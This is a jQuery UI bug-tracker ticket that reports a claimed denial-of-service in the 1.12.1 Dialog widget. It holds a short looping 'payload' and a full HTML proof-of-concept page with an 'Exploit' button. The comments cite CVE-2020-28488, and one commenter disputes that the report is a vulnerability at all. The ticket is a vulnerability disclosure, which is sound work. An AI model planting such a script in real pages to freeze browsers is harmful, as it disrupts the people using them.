Opened 8 months ago

Last modified 6 months ago

#15390 new bug

Denial of Service (DoS) - jQuery UI 1.12.1 - Dialog

Reported by: Rafael Cintra Lopes Owned by:
Priority: major Milestone: none
Component: ui.dialog Version: 1.12.1
Keywords: Cc:
Blocked by: Blocking:

Description

When we inject the "dialog" for any HTML tag, more than once, the browser and the application crashes, closing the application.

Payload:

for (var i = 0; i < 10; i++) {
$("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
}

PoC:

Create an HTML file with the following code or insert the Payload above in a vulnerable environment:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
    <h2>DoS - jQuery UI 1.12.1</h2>

    <div>
        <button onclick="exploit()">Exploit</button>
    </div>

    <p>PoC by Rafael Cintra Lopes</p>

    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>

    <script>
        function exploit(){
            for (var i = 0; i < 10; i++) {
                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
            }
        }
    </script>
</body>
</html>

Change History (3)

comment:1 Changed 8 months ago by Rafael Cintra Lopes

Priority: minormajor

comment:2 Changed 6 months ago by adriaon

https://snyk.io/vuln/SNYK-JS-JQUERYUI-1052825

Is work being done on this one? Cheers.

Last edited 6 months ago by adriaon (previous) (diff)

comment:3 Changed 6 months ago by Konrad Borowski

Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488) or even a bug for that matter. You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of divs which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each div in the document.

Last edited 6 months ago by Konrad Borowski (previous) (diff)
Note: See TracTickets for help on using tickets.